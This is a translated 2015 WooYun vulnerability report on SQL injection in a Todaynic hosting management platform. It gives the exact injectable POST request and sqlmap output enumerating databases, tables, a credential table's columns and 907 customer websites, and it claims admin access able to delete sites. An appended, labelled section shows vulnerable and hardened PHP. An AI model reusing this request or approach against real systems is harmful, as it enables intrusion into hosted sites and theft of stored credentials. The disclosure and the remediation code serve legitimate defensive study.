SQL injection in a 时代互联 (Todaynic) management platform led to the compromise of nearly a thousand websites

2015-09-21 21:00

Injection point

POST /admin.php/website/check HTTP/1.1
Content-Length: 328
Content-Type: application/x-www-form-urlencoded
Host: a.now.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

submit=%e6%8f%90%e4%ba%a4&bind_status=3&id=*





Databases

available databases [11]:
[*] #mysql50#lost+found
[*] #mysql50#webphone.bak20150806
[*] db_now_net_cn
[*] information_schema
[*] mysql
[*] performance_schema
[*] proftpd
[*] test
[*] webphone
[*] webphone_bak
[*] webphone_center

Database: db_now_net_cn
[16 tables]
+----------------+
| APIControl     |
| Albums         |
| ApacheLog      |
| ApacheLog_more |
| JTomcat        |
| Options        |
| Photos         |
| Security       |
| VDNS           |
| VDNSI          |
| VHostLog       |
| VHostReferring |
| VHostServer    |
| VHostServer_M  |
| VHostSub       |
| VHostSub_M     |
+----------------+





Site information

Database: db_now_net_cn
Table: APIControl
[13 columns]
+-------------+-------------+
| Column      | Type        |
+-------------+-------------+
| APIContact  | varchar(30) |
| APIHost     | varchar(60) |
| APILogin    | varchar(30) |
| APIName     | varchar(50) |
| APIPassword | varchar(33) |
| APIPort     | varchar(6)  |
| chrEmail    | varchar(30) |
| chrTel      | varchar(30) |
| cltrid      | int(11)     |
| dtUpdate    | datetime    |
| IDAPI       | int(11)     |
| intActive   | tinyint(4)  |
| intMoney    | int(11)     |
+-------------+-------------+







907 websites

Database: webphone_center
+--------------------+---------+
| Table              | Entries |
+--------------------+---------+
| wp_admin_log       | 2897    |
| wp_website         | 907     |
| wp_themes          | 26      |
| wp_themes_category | 11      |
| wp_admin           | 1       |
+--------------------+---------+





There is also a database with 7036 tables; I couldn't be bothered to dump it.

web application technology: PHP 5.5.18, Apache 2.4.10
back-end DBMS: MySQL 5.0
[22:47:36] [WARNING] missing table parameter, sqlmap will retrieve the number of entries for all database management system databases' tables
[22:47:36] [INFO] fetching tables for database: 'webphone_bak'
[22:47:36] [INFO] the SQL query used returns 7036 entries
[22:47:37] [WARNING] reflective value(s) found and filtering out
[22:47:37] [INFO] retrieved: np_002_hr_category
[22:47:37] [INFO] retrieved: np_200_hr_category
[22:47:37] [INFO] retrieved: np_200_hr_company
[22:47:38] [INFO] retrieved: np_200_hr_job
[22:47:38] [INFO] retrieved: np_200_hr_list
[22:47:38] [INFO] retrieved: np_200_link
[22:47:39] [INFO] retrieved: np_200_nav
[22:47:39] [INFO] retrieved: np_200_page
[22:47:39] [INFO] retrieved: np_200_product
[22:47:40] [INFO] retrieved: np_200_product_category
[22:47:40] [INFO] retrieved: np_200_show
[22:47:40] [INFO] retrieved: np_2013_admin
[22:47:41] [INFO] retrieved: np_2013_admin_log
[22:47:41] [INFO] retrieved: np_2013_article

Proof of vulnerability:

Logging in

Server configuration

[screenshot: QQ图片20150806235215.png]

Site information

[screenshot: QQ图片20150806235256.png]

The privileges are very broad: sites can be shut down or deleted directly.

[screenshot: QQ图片20150806235321.png]

Fix:

23333
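The report offers no fix, so the following is an added example, not code from the original report or from the affected platform. It sketches a hypothetical PHP handler for the `POST /admin.php/website/check` action in two forms: the string-concatenation pattern that makes a parameter such as `id` (the `*` in the captured request marks the parameter sqlmap injected into) part of the SQL text, and a hardened version that validates both parameters as integers and binds them through PDO prepared statements. The table `wp_website` comes from the report's output; the column names `domain` and `bind_status`, the DSN and the credential placeholders are assumptions.

```php
<?php
// Added example, not code from the original report or the affected platform.
// Hypothetical handler for POST /admin.php/website/check. The table wp_website is
// taken from the report; columns "domain"/"bind_status" and the DSN are assumed.

// --- Vulnerable pattern (shown for contrast only) ------------------------------
// Request parameters are concatenated into the SQL text, so whatever is sent in
// "id" is parsed by MySQL as SQL. This is the defect class the report documents.
function checkWebsiteVulnerable(mysqli $db, array $post): ?array
{
    $id         = $post['id'] ?? '';
    $bindStatus = $post['bind_status'] ?? '';
    $sql = "SELECT id, domain, bind_status FROM wp_website "
         . "WHERE id = " . $id . " AND bind_status = " . $bindStatus;
    $res = $db->query($sql);
    return $res ? $res->fetch_assoc() : null;
}

// --- Hardened version ----------------------------------------------------------
// 1. Validate: each parameter must be a short string of decimal digits, so
//    anything that is not a non-negative integer is rejected before the
//    database layer sees it.
// 2. Parameterize: the SQL text is constant and the values are bound as
//    integers, so user input is never interpreted as SQL.
function readIntParam(array $post, string $name, int $max = PHP_INT_MAX): int
{
    $raw = $post[$name] ?? null;
    if (!is_string($raw) || !ctype_digit($raw) || strlen($raw) > 18) {
        throw new InvalidArgumentException("parameter '$name' must be a non-negative integer");
    }
    $value = (int) $raw;
    if ($value > $max) {
        throw new InvalidArgumentException("parameter '$name' is out of range");
    }
    return $value;
}

function checkWebsiteHardened(PDO $db, array $post): ?array
{
    $id         = readIntParam($post, 'id');
    $bindStatus = readIntParam($post, 'bind_status', 9); // assumed small status enum

    $stmt = $db->prepare(
        'SELECT id, domain, bind_status FROM wp_website WHERE id = :id AND bind_status = :status'
    );
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->bindValue(':status', $bindStatus, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Connection for the hardened path: real server-side prepares (no client-side
// emulation) and exceptions instead of silent "false" returns on error.
function connect(string $dsn, string $user, string $pass): PDO
{
    return new PDO($dsn, $user, $pass, [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false,
    ]);
}

// Usage (DSN and credentials are placeholders):
// $db = connect('mysql:host=127.0.0.1;dbname=webphone_center;charset=utf8mb4', 'DB_USER', 'DB_PASS');
// try {
//     $row = checkWebsiteHardened($db, $_POST);
//     echo json_encode(['ok' => true, 'website' => $row]);
// } catch (InvalidArgumentException $e) {
//     http_response_code(400);
//     echo json_encode(['ok' => false, 'error' => $e->getMessage()]);
// }
```

The prepared statement is the actual fix; the integer validation is defence in depth that also yields a clean 400 for malformed input instead of a database error. Equally important given the eleven databases enumerated above: the account this handler connects with should have privileges on the few tables it needs in `webphone_center` and nothing else, so a residual injection cannot read the `APIControl` credentials in `db_now_net_cn` or touch the backup databases.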

Source: www.wooyun.org/bugs/wooyun-2015-0132364
